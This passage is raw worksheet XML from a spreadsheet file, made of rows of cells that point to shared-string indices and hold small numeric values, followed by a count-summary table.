      </c>
      <c r="D2" s="1" t="s">
        <v>12</v>
      </c>
      <c r="E2" s="1">
        <v>133</v>
      </c>
      <c r="F2" s="1" t="s">
        <v>13</v>
      </c>
      <c r="G2" s="1" t="s">
        <v>14</v>
      </c>
      <c r="H2" s="1" t="s">
        <v>15</v>
      </c>
      <c r="I2" s="1">
        <v>10</v>
      </c>
      <c r="J2" s="1" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="3" spans="1:10">
      <c r="A3" s="1"/>
      <c r="B3" s="25" t="s">
        <v>17</v>
      </c>
      <c r="C3" s="1" t="s">
        <v>18</v>
      </c>
      <c r="D3" s="1" t="s">
        <v>19</v>
      </c>
      <c r="E3" s="1">
        <v>70</v>
      </c>
      <c r="F3" s="1" t="s">
        <v>20</v>
      </c>
      <c r="G3" s="1" t="s">
        <v>21</v>
      </c>
      <c r="H3" s="1" t="s">
        <v>22</v>
      </c>
      <c r="I3" s="1">
        <v>20</v>
      </c>
      <c r="J3" s="1"/>
    </row>
    <row r="4" spans="1:10">
      <c r="A4" s="1"/>
      <c r="B4" s="25" t="s">
        <v>23</v>
      </c>
      <c r="C4" s="3" t="s">
        <v>11</v>
      </c>
      <c r="D4" s="1" t="s">
        <v>19</v>
      </c>
      <c r="E4" s="1">
        <v>84</v>
      </c>
      <c r="F4" s="1" t="s">
        <v>13</v>
      </c>
      <c r="G4" s="1" t="s">
        <v>14</v>
      </c>
      <c r="H4" s="1" t="s">
        <v>15</v>
      </c>
      <c r="I4" s="1">
        <v>30</v>
      </c>
      <c r="J4" s="1" t="s">
        <v>24</v>
      </c>
    </row>
    <row r="5" spans="1:10">
      <c r="A5" s="1"/>
      <c r="B5" s="26" t="s">
        <v>25</v>
      </c>
      <c r="C5" s="1" t="s">
        <v>18</v>
      </c>
      <c r="D5" s="1" t="s">
        <v>19</v>
      </c>
      <c r="E5" s="1">
        <v>89</v>
      </c>
      <c r="F5" s="1" t="s">
        <v>26</v>
      </c>
      <c r="G5" s="1" t="s">
        <v>21</v>
      </c>
      <c r="H5" s="1" t="s">
        <v>27</v>
      </c>
      <c r="I5" s="1">
        <v>20</v>
      </c>
      <c r="J5" s="1"/>
    </row>
    <row r="6" spans="1:10">
      <c r="A6" s="1"/>
      <c r="B6" s="26" t="s">
        <v>28</v>
      </c>
      <c r="C6" s="1" t="s">
        <v>29</v>
      </c>
      <c r="D6" s="1" t="s">
        <v>30</v>
      </c>
      <c r="E6" s="1">
        <v>106</v>
      </c>
      <c r="F6" s="1" t="s">
        <v>31</v>
      </c>
      <c r="G6" s="1" t="s">
        <v>14</v>
      </c>
      <c r="H6" s="1" t="s">
        <v>15</v>
      </c>
      <c r="I6" s="1">
        <v>20</v>
      </c>
      <c r="J6" s="1" t="s">
        <v>32</v>
      </c>
    </row>
    <row r="7" spans="1:10">
      <c r="A7" s="1"/>
      <c r="B7" s="25" t="s">
        <v>33</v>
      </c>
      <c r="C7" s="3" t="s">
        <v>11</v>
      </c>
      <c r="D7" s="1" t="s">
        <v>19</v>
      </c>
      <c r="E7" s="24"/>
      <c r="F7" s="1"/>
      <c r="G7" s="1" t="s">
        <v>14</v>
      </c>
      <c r="H7" s="1" t="s">
        <v>15</v>
      </c>
      <c r="I7" s="1">
        <v>20</v>
      </c>
      <c r="J7" s="1" t="s">
        <v>34</v>
      </c>
    </row>
    <row r="8" spans="1:10">
      <c r="A8" s="1"/>
      <c r="B8" s="26" t="s">
        <v>35</v>
      </c>
      <c r="C8" s="1" t="s">
        <v>36</v>
      </c>
      <c r="D8" s="1" t="s">
        <v>19</v>
      </c>
      <c r="E8" s="24"/>
      <c r="F8" s="1" t="s">
        <v>37</v>
      </c>
      <c r="G8" s="1" t="s">
        <v>14</v>
      </c>
      <c r="H8" s="1" t="s">
        <v>15</v>
      </c>
      <c r="I8" s="1">
        <v>15</v>
      </c>
      <c r="J8" s="1" t="s">
        <v>38</v>
      </c>
    </row>
    <row r="9" spans="1:10">
      <c r="A9" s="1"/>
      <c r="B9" s="26" t="s">
        <v>39</v>
      </c>
      <c r="C9" s="1" t="s">
        <v>29</v>
      </c>
      <c r="D9" s="1" t="s">
        <v>30</v>
      </c>
      <c r="E9" s="1"/>
      <c r="F9" s="1" t="s">
        <v>37</v>
      </c>
      <c r="G9" s="1" t="s">
        <v>14</v>
      </c>
      <c r="H9" s="1" t="s">
        <v>15</v>
      </c>
      <c r="I9" s="1">
        <v>15</v>
      </c>
      <c r="J9" s="1" t="s">
        <v>38</v>
      </c>
    </row>
    <row r="10" spans="1:10">
      <c r="A10" s="1"/>
      <c r="B10" s="1" t="s">
        <v>40</v>
      </c>
      <c r="C10" s="1" t="s">
        <v>29</v>
      </c>
      <c r="D10" s="1" t="s">
        <v>19</v>
      </c>
      <c r="E10" s="24"/>
      <c r="F10" s="1" t="s">
        <v>41</v>
      </c>
      <c r="G10" s="1" t="s">
        <v>14</v>
      </c>
      <c r="H10" s="1" t="s">
        <v>15</v>
      </c>
      <c r="I10" s="1">
        <v>15</v>
      </c>
      <c r="J10" s="1" t="s">
        <v>38</v>
      </c>
    </row>
    <row r="11" spans="1:10">
      <c r="A11" s="1"/>
      <c r="B11" s="26" t="s">
        <v>42</v>
      </c>
      <c r="C11" s="1" t="s">
        <v>29</v>
      </c>
      <c r="D11" s="1" t="s">
        <v>19</v>
      </c>
      <c r="E11" s="24"/>
      <c r="F11" s="1" t="s">
        <v>13</v>
      </c>
      <c r="G11" s="1" t="s">
        <v>14</v>
      </c>
      <c r="H11" s="1" t="s">
        <v>15</v>
      </c>
      <c r="I11" s="1">
        <v>15</v>
      </c>
      <c r="J11" s="1" t="s">
        <v>38</v>
      </c>
    </row>
    <row r="12" spans="1:10">
      <c r="A12" s="1"/>
      <c r="B12" s="26" t="s">
        <v>43</v>
      </c>
      <c r="C12" s="3" t="s">
        <v>11</v>
      </c>
      <c r="D12" s="1" t="s">
        <v>19</v>
      </c>
      <c r="E12" s="24"/>
      <c r="F12" s="1" t="s">
        <v>44</v>
      </c>
      <c r="G12" s="1" t="s">
        <v>14</v>
      </c>
      <c r="H12" s="1" t="s">
        <v>15</v>
      </c>
      <c r="I12" s="1">
        <v>20</v>
      </c>
      <c r="J12" s="1"/>
    </row>
    <row r="13" spans="1:10">
      <c r="A13" s="1"/>
      <c r="B13" s="1" t="s">
        <v>45</v>
      </c>
      <c r="C13" s="3" t="s">
        <v>11</v>
      </c>
      <c r="D13" s="1" t="s">
        <v>19</v>
      </c>
      <c r="E13" s="24"/>
      <c r="F13" s="1" t="s">
        <v>44</v>
      </c>
      <c r="G13" s="1" t="s">
        <v>14</v>
      </c>
      <c r="H13" s="1" t="s">
        <v>15</v>
      </c>
      <c r="I13" s="1">
        <v>25</v>
      </c>
      <c r="J13" s="1"/>
    </row>
    <row r="14" spans="1:10">
      <c r="A14" s="1"/>
      <c r="B14" s="26" t="s">
        <v>46</v>
      </c>
      <c r="C14" s="1" t="s">
        <v>29</v>
      </c>
      <c r="D14" s="1" t="s">
        <v>19</v>
      </c>
      <c r="E14" s="24"/>
      <c r="F14" s="1" t="s">
        <v>13</v>
      </c>
      <c r="G14" s="1" t="s">
        <v>14</v>
      </c>
      <c r="H14" s="1" t="s">
        <v>15</v>
      </c>
      <c r="I14" s="1">
        <v>10</v>
      </c>
      <c r="J14" s="1" t="s">
        <v>47</v>
      </c>
    </row>
    <row r="15" spans="1:10">
      <c r="A15" s="1"/>
      <c r="B15" s="1" t="s">
        <v>48</v>
      </c>
      <c r="C15" s="1" t="s">
        <v>29</v>
      </c>
      <c r="D15" s="1" t="s">
        <v>19</v>
      </c>
      <c r="E15" s="24"/>
      <c r="F15" s="1" t="s">
        <v>13</v>
      </c>
      <c r="G15" s="1" t="s">
        <v>14</v>
      </c>
      <c r="H15" s="1" t="s">
        <v>15</v>
      </c>
      <c r="I15" s="1">
        <v>10</v>
      </c>
      <c r="J15" s="1" t="s">
        <v>38</v>
      </c>
    </row>
    <row r="16" spans="1:10">
      <c r="A16" s="1"/>
      <c r="B16" s="26" t="s">
        <v>49</v>
      </c>
      <c r="C16" s="1" t="s">
        <v>29</v>
      </c>
      <c r="D16" s="1" t="s">
        <v>19</v>
      </c>
      <c r="E16" s="24"/>
      <c r="F16" s="1" t="s">
        <v>13</v>
      </c>
      <c r="G16" s="1" t="s">
        <v>14</v>
      </c>
      <c r="H16" s="1" t="s">
        <v>15</v>
      </c>
      <c r="I16" s="1">
        <v>20</v>
      </c>
      <c r="J16" s="1" t="s">
        <v>38</v>
      </c>
    </row>
    <row r="17" spans="1:10">
      <c r="A17" s="1"/>
      <c r="B17" s="1" t="s">
        <v>50</v>
      </c>
      <c r="C17" s="24" t="s">
        <v>11</v>
      </c>
      <c r="D17" s="24" t="s">
        <v>30</v>
      </c>
      <c r="E17" s="24"/>
      <c r="F17" s="1" t="s">
        <v>13</v>
      </c>
      <c r="G17" s="1" t="s">
        <v>14</v>
      </c>
      <c r="H17" s="1" t="s">
        <v>15</v>
      </c>
      <c r="I17" s="1">
        <v>15</v>
      </c>
      <c r="J17" s="1" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="18" spans="1:10">
      <c r="A18" s="1"/>
      <c r="B18" s="26" t="s">
        <v>52</v>
      </c>
      <c r="C18" s="3" t="s">
        <v>11</v>
      </c>
      <c r="D18" s="1" t="s">
        <v>19</v>
      </c>
      <c r="E18" s="1"/>
      <c r="F18" s="1" t="s">
        <v>13</v>
      </c>
      <c r="G18" s="1" t="s">
        <v>53</v>
      </c>
      <c r="H18" s="1"/>
      <c r="I18" s="1">
        <v>120</v>
      </c>
      <c r="J18" s="1" t="s">
        <v>54</v>
      </c>
    </row>
    <row r="19" spans="1:10">
      <c r="A19" s="1"/>
      <c r="B19" s="1" t="s">
        <v>55</v>
      </c>
      <c r="C19" s="1" t="s">
        <v>29</v>
      </c>
      <c r="D19" s="1" t="s">
        <v>30</v>
      </c>
      <c r="E19" s="1"/>
      <c r="F19" s="1" t="s">
        <v>13</v>
      </c>
      <c r="G19" s="1" t="s">
        <v>14</v>
      </c>
      <c r="H19" s="1" t="s">
        <v>15</v>
      </c>
      <c r="I19" s="1">
        <v>5</v>
      </c>
      <c r="J19" s="1" t="s">
        <v>38</v>
      </c>
    </row>
    <row r="20" spans="1:10">
      <c r="A20" s="1"/>
      <c r="B20" s="25" t="s">
        <v>56</v>
      </c>
      <c r="C20" s="1" t="s">
        <v>29</v>
      </c>
      <c r="D20" s="1" t="s">
        <v>19</v>
      </c>
      <c r="E20" s="24"/>
      <c r="F20" s="1" t="s">
        <v>13</v>
      </c>
      <c r="G20" s="1" t="s">
        <v>14</v>
      </c>
      <c r="H20" s="1" t="s">
        <v>15</v>
      </c>
      <c r="I20" s="1">
        <v>10</v>
      </c>
      <c r="J20" s="1" t="s">
        <v>38</v>
      </c>
    </row>
    <row r="21" spans="1:10">
      <c r="A21" s="1"/>
      <c r="B21" s="25" t="s">
        <v>57</v>
      </c>
      <c r="C21" s="3" t="s">
        <v>11</v>
      </c>
      <c r="D21" s="1" t="s">
        <v>19</v>
      </c>
      <c r="E21" s="24"/>
      <c r="F21" s="1" t="s">
        <v>26</v>
      </c>
      <c r="G21" s="1" t="s">
        <v>58</v>
      </c>
      <c r="H21" s="25" t="s">
        <v>59</v>
      </c>
      <c r="I21" s="1">
        <v>120</v>
      </c>
      <c r="J21" s="1"/>
    </row>
    <row r="22" spans="1:10">
      <c r="B22" s="28" t="s">
        <v>60</v>
      </c>
      <c r="C22" t="s">
        <v>29</v>
      </c>
      <c r="D22" t="s">
        <v>19</v>
      </c>
      <c r="F22" t="s">
        <v>61</v>
      </c>
      <c r="G22" t="s">
        <v>53</v>
      </c>
      <c r="I22">
        <v>20</v>
      </c>
      <c r="J22" t="s">
        <v>62</v>
      </c>
    </row>
    <row r="23" spans="1:10">
      <c r="B23" s="28" t="s">
        <v>63</v>
      </c>
      <c r="C23" t="s">
        <v>64</v>
      </c>
      <c r="D23" s="1" t="s">
        <v>12</v>
      </c>
      <c r="E23">
        <v>13</v>
      </c>
      <c r="F23" t="s">
        <v>37</v>
      </c>
      <c r="G23" t="s">
        <v>14</v>
      </c>
      <c r="H23" t="s">
        <v>15</v>
      </c>
      <c r="I23">
        <v>15</v>
      </c>
      <c r="J23" t="s">
        <v>65</v>
      </c>
    </row>
    <row r="24" spans="1:10">
      <c r="B24" s="28" t="s">
        <v>66</v>
      </c>
      <c r="C24" t="s">
        <v>18</v>
      </c>
      <c r="D24" t="s">
        <v>19</v>
      </c>
      <c r="F24" t="s">
        <v>67</v>
      </c>
      <c r="G24" t="s">
        <v>14</v>
      </c>
      <c r="H24" t="s">
        <v>68</v>
      </c>
      <c r="I24">
        <v>10</v>
      </c>
      <c r="J24" t="s">
        <v>69</v>
      </c>
    </row>
    <row r="25" spans="1:10">
      <c r="B25" s="28" t="s">
        <v>70</v>
      </c>
      <c r="C25" t="s">
        <v>64</v>
      </c>
      <c r="D25" t="s">
        <v>30</v>
      </c>
      <c r="E25">
        <v>44</v>
      </c>
      <c r="F25" t="s">
        <v>71</v>
      </c>
      <c r="G25" t="s">
        <v>14</v>
      </c>
      <c r="H25" t="s">
        <v>15</v>
      </c>
      <c r="I25">
        <v>10</v>
      </c>
    </row>
    <row r="26" spans="1:10">
      <c r="B26" s="27" t="s">
        <v>72</v>
      </c>
      <c r="C26" t="s">
        <v>29</v>
      </c>
      <c r="D26" s="1" t="s">
        <v>12</v>
      </c>
      <c r="E26">
        <v>50</v>
      </c>
      <c r="F26" t="s">
        <v>41</v>
      </c>
      <c r="G26" t="s">
        <v>14</v>
      </c>
      <c r="H26" t="s">
        <v>15</v>
      </c>
      <c r="I26">
        <v>10</v>
      </c>
    </row>
    <row r="27" spans="1:10">
      <c r="B27" s="28" t="s">
        <v>73</v>
      </c>
      <c r="C27" t="s">
        <v>29</v>
      </c>
      <c r="D27" t="s">
        <v>19</v>
      </c>
      <c r="E27">
        <v>27</v>
      </c>
      <c r="F27" t="s">
        <v>41</v>
      </c>
      <c r="G27" t="s">
        <v>14</v>
      </c>
      <c r="H27" t="s">
        <v>15</v>
      </c>
      <c r="I27">
        <v>15</v>
      </c>
    </row>
    <row r="28" spans="1:10">
      <c r="B28" s="28" t="s">
        <v>74</v>
      </c>
      <c r="C28" s="3" t="s">
        <v>11</v>
      </c>
      <c r="D28" t="s">
        <v>19</v>
      </c>
      <c r="E28">
        <v>45</v>
      </c>
      <c r="F28" t="s">
        <v>75</v>
      </c>
      <c r="G28" t="s">
        <v>14</v>
      </c>
      <c r="H28" t="s">
        <v>15</v>
      </c>
      <c r="I28">
        <v>20</v>
      </c>
    </row>
    <row r="29" spans="1:10">
      <c r="B29" s="27" t="s">
        <v>76</v>
      </c>
      <c r="C29" t="s">
        <v>64</v>
      </c>
      <c r="D29" t="s">
        <v>19</v>
      </c>
      <c r="F29" t="s">
        <v>75</v>
      </c>
      <c r="G29" t="s">
        <v>14</v>
      </c>
      <c r="H29" t="s">
        <v>15</v>
      </c>
      <c r="I29">
        <v>15</v>
      </c>
    </row>
    <row r="30" spans="1:10">
      <c r="B30" s="27" t="s">
        <v>77</v>
      </c>
      <c r="C30" s="3" t="s">
        <v>11</v>
      </c>
      <c r="D30" t="s">
        <v>19</v>
      </c>
      <c r="F30" t="s">
        <v>78</v>
      </c>
      <c r="G30" t="s">
        <v>14</v>
      </c>
      <c r="H30" t="s">
        <v>15</v>
      </c>
      <c r="I30">
        <v>10</v>
      </c>
    </row>
    <row r="31" spans="1:10">
      <c r="B31" s="28" t="s">
        <v>79</v>
      </c>
      <c r="C31" s="3" t="s">
        <v>11</v>
      </c>
      <c r="D31" t="s">
        <v>19</v>
      </c>
      <c r="E31">
        <v>139</v>
      </c>
      <c r="F31" t="s">
        <v>75</v>
      </c>
      <c r="G31" t="s">
        <v>58</v>
      </c>
      <c r="H31" s="23" t="s">
        <v>80</v>
      </c>
      <c r="I31">
        <v>100</v>
      </c>
    </row>
    <row r="32" spans="1:10">
      <c r="B32" s="28" t="s">
        <v>81</v>
      </c>
      <c r="C32" s="3" t="s">
        <v>11</v>
      </c>
      <c r="D32" t="s">
        <v>19</v>
      </c>
      <c r="F32" t="s">
        <v>71</v>
      </c>
      <c r="G32" t="s">
        <v>14</v>
      </c>
      <c r="H32" t="s">
        <v>15</v>
      </c>
      <c r="I32">
        <v>10</v>
      </c>
    </row>
    <row r="33" spans="2:10">
      <c r="B33" s="28" t="s">
        <v>82</v>
      </c>
      <c r="C33" t="s">
        <v>29</v>
      </c>
      <c r="D33" t="s">
        <v>30</v>
      </c>
      <c r="F33" t="s">
        <v>71</v>
      </c>
      <c r="G33" t="s">
        <v>14</v>
      </c>
      <c r="H33" t="s">
        <v>15</v>
      </c>
      <c r="I33">
        <v>5</v>
      </c>
    </row>
    <row r="34" spans="2:10">
      <c r="B34" s="28" t="s">
        <v>83</v>
      </c>
      <c r="C34" t="s">
        <v>29</v>
      </c>
      <c r="D34" t="s">
        <v>19</v>
      </c>
      <c r="F34" t="s">
        <v>84</v>
      </c>
      <c r="G34" t="s">
        <v>14</v>
      </c>
      <c r="H34" t="s">
        <v>85</v>
      </c>
      <c r="I34">
        <v>10</v>
      </c>
    </row>
    <row r="35" spans="2:10">
      <c r="B35" s="28" t="s">
        <v>86</v>
      </c>
      <c r="C35" t="s">
        <v>29</v>
      </c>
      <c r="D35" t="s">
        <v>19</v>
      </c>
      <c r="F35" t="s">
        <v>87</v>
      </c>
      <c r="G35" t="s">
        <v>14</v>
      </c>
      <c r="H35" t="s">
        <v>88</v>
      </c>
      <c r="I35">
        <v>10</v>
      </c>
    </row>
    <row r="36" spans="2:10">
      <c r="B36" s="28" t="s">
        <v>89</v>
      </c>
      <c r="C36" s="3" t="s">
        <v>11</v>
      </c>
      <c r="D36" s="1" t="s">
        <v>12</v>
      </c>
      <c r="F36" t="s">
        <v>90</v>
      </c>
      <c r="G36" t="s">
        <v>14</v>
      </c>
      <c r="H36" t="s">
        <v>15</v>
      </c>
      <c r="I36">
        <v>10</v>
      </c>
    </row>
    <row r="37" spans="2:10">
      <c r="B37" s="27" t="s">
        <v>91</v>
      </c>
      <c r="C37" t="s">
        <v>29</v>
      </c>
      <c r="D37" s="1" t="s">
        <v>12</v>
      </c>
      <c r="F37" t="s">
        <v>37</v>
      </c>
      <c r="G37" t="s">
        <v>14</v>
      </c>
      <c r="H37" t="s">
        <v>15</v>
      </c>
      <c r="I37">
        <v>10</v>
      </c>
      <c r="J37" t="s">
        <v>65</v>
      </c>
    </row>
    <row r="38" spans="2:10">
      <c r="B38" s="28" t="s">
        <v>92</v>
      </c>
      <c r="C38" s="3" t="s">
        <v>11</v>
      </c>
      <c r="D38" t="s">
        <v>19</v>
      </c>
      <c r="E38">
        <v>228</v>
      </c>
      <c r="F38" t="s">
        <v>26</v>
      </c>
      <c r="G38" t="s">
        <v>58</v>
      </c>
      <c r="H38" s="23" t="s">
        <v>93</v>
      </c>
      <c r="I38">
        <v>120</v>
      </c>
    </row>
    <row r="39" spans="2:10">
      <c r="B39" s="27" t="s">
        <v>94</v>
      </c>
      <c r="C39" t="s">
        <v>64</v>
      </c>
      <c r="D39" t="s">
        <v>19</v>
      </c>
      <c r="F39" t="s">
        <v>84</v>
      </c>
      <c r="G39" t="s">
        <v>14</v>
      </c>
      <c r="H39" t="s">
        <v>15</v>
      </c>
      <c r="I39">
        <v>5</v>
      </c>
    </row>
    <row r="40" spans="2:10">
      <c r="B40" s="27" t="s">
        <v>95</v>
      </c>
      <c r="C40" t="s">
        <v>11</v>
      </c>
      <c r="D40" t="s">
        <v>19</v>
      </c>
      <c r="F40" t="s">
        <v>75</v>
      </c>
      <c r="G40" t="s">
        <v>96</v>
      </c>
      <c r="I40">
        <v>120</v>
      </c>
      <c r="J40" t="s">
        <v>97</v>
      </c>
    </row>
    <row r="41" spans="2:10">
      <c r="B41" s="27" t="s">
        <v>98</v>
      </c>
      <c r="C41" s="57" t="s">
        <v>29</v>
      </c>
      <c r="D41" t="s">
        <v>19</v>
      </c>
      <c r="F41" t="s">
        <v>84</v>
      </c>
      <c r="G41" t="s">
        <v>53</v>
      </c>
      <c r="I41">
        <v>5</v>
      </c>
    </row>
    <row r="42" spans="2:10">
      <c r="B42" s="27" t="s">
        <v>99</v>
      </c>
      <c r="C42" t="s">
        <v>11</v>
      </c>
      <c r="D42" t="s">
        <v>19</v>
      </c>
      <c r="F42" t="s">
        <v>75</v>
      </c>
      <c r="G42" t="s">
        <v>14</v>
      </c>
      <c r="H42" t="s">
        <v>15</v>
      </c>
      <c r="I42">
        <v>10</v>
      </c>
    </row>
    <row r="43" spans="2:10">
      <c r="B43" s="28" t="s">
        <v>100</v>
      </c>
      <c r="C43" t="s">
        <v>29</v>
      </c>
      <c r="D43" t="s">
        <v>19</v>
      </c>
      <c r="F43" t="s">
        <v>75</v>
      </c>
      <c r="G43" t="s">
        <v>96</v>
      </c>
      <c r="H43" t="s">
        <v>101</v>
      </c>
      <c r="I43">
        <v>5</v>
      </c>
    </row>
    <row r="44" spans="2:10">
      <c r="B44" s="27" t="s">
        <v>102</v>
      </c>
      <c r="C44" t="s">
        <v>29</v>
      </c>
      <c r="D44" t="s">
        <v>19</v>
      </c>
      <c r="F44" t="s">
        <v>75</v>
      </c>
      <c r="G44" t="s">
        <v>14</v>
      </c>
      <c r="H44" t="s">
        <v>15</v>
      </c>
      <c r="I44">
        <v>5</v>
      </c>
      <c r="J44" t="s">
        <v>103</v>
      </c>
    </row>
    <row r="45" spans="2:10">
      <c r="B45" s="27" t="s">
        <v>104</v>
      </c>
      <c r="C45" t="s">
        <v>29</v>
      </c>
      <c r="D45" t="s">
        <v>30</v>
      </c>
      <c r="F45" t="s">
        <v>75</v>
      </c>
      <c r="G45" t="s">
        <v>14</v>
      </c>
      <c r="H45" t="s">
        <v>15</v>
      </c>
      <c r="I45">
        <v>5</v>
      </c>
      <c r="J45" t="s">
        <v>105</v>
      </c>
    </row>
    <row r="46" spans="2:10">
      <c r="B46" s="28" t="s">
        <v>106</v>
      </c>
      <c r="C46" t="s">
        <v>11</v>
      </c>
      <c r="D46" t="s">
        <v>19</v>
      </c>
      <c r="E46">
        <v>677</v>
      </c>
      <c r="F46" t="s">
        <v>26</v>
      </c>
      <c r="G46" t="s">
        <v>58</v>
      </c>
      <c r="H46" s="23" t="s">
        <v>107</v>
      </c>
      <c r="I46">
        <v>45</v>
      </c>
      <c r="J46" t="s">
        <v>108</v>
      </c>
    </row>
    <row r="47" spans="2:10">
      <c r="B47" s="28" t="s">
        <v>109</v>
      </c>
      <c r="C47" t="s">
        <v>29</v>
      </c>
      <c r="D47" t="s">
        <v>19</v>
      </c>
      <c r="F47" t="s">
        <v>75</v>
      </c>
      <c r="G47" t="s">
        <v>14</v>
      </c>
      <c r="H47" t="s">
        <v>15</v>
      </c>
      <c r="I47">
        <v>5</v>
      </c>
    </row>
    <row r="48" spans="2:10">
      <c r="B48" s="27" t="s">
        <v>110</v>
      </c>
      <c r="C48" t="s">
        <v>11</v>
      </c>
      <c r="D48" t="s">
        <v>19</v>
      </c>
      <c r="F48" t="s">
        <v>75</v>
      </c>
      <c r="G48" t="s">
        <v>14</v>
      </c>
      <c r="H48" t="s">
        <v>15</v>
      </c>
      <c r="I48">
        <v>5</v>
      </c>
    </row>
    <row r="49" spans="2:10">
      <c r="B49" s="28" t="s">
        <v>111</v>
      </c>
      <c r="C49" t="s">
        <v>11</v>
      </c>
      <c r="D49" t="s">
        <v>19</v>
      </c>
      <c r="F49" t="s">
        <v>26</v>
      </c>
      <c r="G49" t="s">
        <v>96</v>
      </c>
      <c r="I49">
        <v>120</v>
      </c>
      <c r="J49" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="50" spans="2:10">
      <c r="B50" s="28" t="s">
        <v>113</v>
      </c>
      <c r="C50" t="s">
        <v>11</v>
      </c>
      <c r="D50" t="s">
        <v>19</v>
      </c>
      <c r="F50" t="s">
        <v>26</v>
      </c>
      <c r="G50" t="s">
        <v>14</v>
      </c>
      <c r="H50" t="s">
        <v>15</v>
      </c>
      <c r="I50">
        <v>5</v>
      </c>
    </row>
    <row r="51" spans="2:10">
      <c r="B51" s="28" t="s">
        <v>114</v>
      </c>
      <c r="C51" t="s">
        <v>11</v>
      </c>
      <c r="D51" t="s">
        <v>19</v>
      </c>
      <c r="F51" t="s">
        <v>26</v>
      </c>
      <c r="G51" t="s">
        <v>14</v>
      </c>
      <c r="H51" t="s">
        <v>85</v>
      </c>
      <c r="I51">
        <v>80</v>
      </c>
      <c r="J51" t="s">
        <v>115</v>
      </c>
    </row>
    <row r="54" spans="2:10">
      <c r="B54" s="58" t="s">
        <v>116</v>
      </c>
      <c r="D54" s="58" t="s">
        <v>3</v>
      </c>
    </row>
    <row r="55" spans="2:10">
      <c r="B55" s="58" t="s">
        <v>2</v>
      </c>
      <c r="C55" s="58" t="s">
        <v>6</v>
      </c>
      <c r="D55" t="s">
        <v>19</v>
      </c>
      <c r="E55" t="s">
        <v>30</v>
      </c>
      <c r="F55" t="s">
        <v>12</v>
      </c>
      <c r="G55" t="s">
        <v>117</v>
      </c>
    </row>
    <row r="56" spans="2:10">
      <c r="B56" t="s">
        <v>36</v>
      </c>
      <c r="C56" t="s">
        <v>14</v>
      </c>
      <c r="D56" s="59">
        <v>1</v>
      </c>
      <c r="E56" s="59"/>
      <c r="F56" s="59"/>
      <c r="G56" s="59">
        <v>1</v>
      </c>
    </row>
    <row r="57" spans="2:10">
      <c r="B57" t="s">
        <v>118</v>
      </c>
      <c r="D57" s="59">
        <v>1</v>
      </c>
      <c r="E57" s="59"/>
      <c r="F57" s="59"/>
      <c r="G57" s="59">
        <v>1</v>
      </c>
    </row>
    <row r="58" spans="2:10">
      <c r="B58" t="s">
        <v>64</v>
      </c>
      <c r="C58" t="s">
        <v>14</v>
      </c>
      <c r="D58" s="59">
        <v>2</v>
      </c>
      <c r="E58" s="59">
        <v>1</v>
      </c>
      <c r="F58" s="59">
        <v>1</v>
      </c>
      <c r="G58" s="59">
        <v>4</v>
      </c>
    </row>
    <row r="59" spans="2:10">
      <c r="B59" t="s">
        <v>119</v>
      </c>
      <c r="D59" s="59">
        <v>2</v>
      </c>
      <c r="E59" s="59">
        <v>1</v>
      </c>
      <c r="F59" s="59">
        <v>1</v>
      </c>
      <c r="G59" s="59">
        <v>4</v>
      </c>
    </row>
    <row r="60" spans="2:10">
      <c r="B60" t="s">
        <v>18</v>
      </c>
      <c r="C60" t="s">
        <v>14</v>
      </c>
      <c r="D60" s="59">
        <v>1</v>
      </c>
      <c r="E60" s="59"/>
      <c r="F60" s="59"/>
      <c r="G60" s="59">
        <v>1</v>
      </c>
    </row>
    <row r="61" spans="2:10">
      <c r="C61" t="s">
        <v>21</v>
      </c>
      <c r="D61" s="59">
        <v>2</v>
      </c>
      <c r="E61" s="59"/>
      <c r="F61" s="59"/>
      <c r="G61" s="59">
        <v>2</v>
      </c>
    </row>
    <row r="62" spans="2:10">
      <c r="B62" t="s">
        <v>120</v>
      </c>
      <c r="D62" s="59">
        <v>3</v>
      </c>
      <c r="E62" s="59"/>
      <c r="F62" s="59"/>
      <c r="G62" s="59">
        <v>3</v>
      </c>
    </row>
    <row r="63" spans="2:10">
      <c r="B63" t="s">
        <v>29</v>
      </c>
      <c r="C63" t="s">
        <v>14</v>
      </c>
      <c r="D63" s="59">
        <v>11</v>
      </c>
      <c r="E63" s="59">
        <v>5</v>
      </c>
      <c r="F63" s="59">
        <v>2</v>
      </c>
      <c r="G63" s="59">
        <v>18</v>
      </c>
    </row>
    <row r="64" spans="2:10">
      <c r="C64" t="s">
        <v>53</v>
      </c>
      <c r="D64" s="59">
        <v>2</v>
      </c>
      <c r="E64" s="59"/>
      <c r="F64" s="59"/>
      <c r="G64" s="59">
        <v>2</v>
      </c>
    </row>
    <row r="65" spans="2:7">
      <c r="C65" t="s">
        <v>96</v>
      </c>
      <c r="D65" s="59">
        <v>1</v>
      </c>
      <c r="E65" s="59"/>
      <c r="F65" s="59"/>
      <c r="G65" s="59">
        <v>1</v>
      </c>
    </row>
    <row r="66" spans="2:7">
      <c r="B66" t="s">
        <v>121</v>
      </c>
      <c r="D66" s="59">
        <v>14</v>
      </c>
      <c r="E66" s="59">
        <v>5</v>
      </c>
      <c r="F66" s="59">
        <v>2</v>
      </c>
      <c r="G66" s="59">
        <v>21</v>
      </c>
    </row>
    <row r="67" spans="2:7">
      <c r="B67" t="s">
        <v>11</v>
      </c>
      <c r="C67" t="s">
        <v>14</v>
      </c>
      <c r="D67" s="59">
        <v>11</v>
      </c>
      <c r="E67" s="59">
        <v>1</v>
      </c>
      <c r="F67" s="59">
        <v>2</v>
      </c>
      <c r="G67" s="59">
        <v>14</v>
      </c>
    </row>
    <row r="68" spans="2:7">
      <c r="C68" t="s">
        <v>53</v>
      </c>
      <c r="D68" s="59">
        <v>1</v>
      </c>
      <c r="E68" s="59"/>
      <c r="F68" s="59"/>
      <c r="G68" s="59">
        <v>1</v>
      </c>
    </row>
    <row r="69" spans="2:7">
      <c r="C69" t="s">
        <v>58</v>
      </c>
      <c r="D69" s="59">
        <v>4</v>
      </c>
      <c r="E69" s="59"/>
      <c r="F69" s="59"/>
      <c r="G69" s="59">
        <v>4</v>
      </c>
    </row>
    <row r="70" spans="2:7">
      <c r="C70" t="s">
        <v>96</v>
      </c>
      <c r="D70" s="59">
        <v>2</v>
      </c>
      <c r="E70" s="59"/>
      <c r="F70" s="59"/>
      <c r="G70" s="59">
        <v>2</v>
      </c>
    </row>
    <row r="71" spans="2:7">
      <c r="B71" t="s">
        <v>122</v>
      </c>
      <c r="D71" s="59">
        <v>18</v>
      </c>
      <c r="E71" s="59">
        <v>1</v>
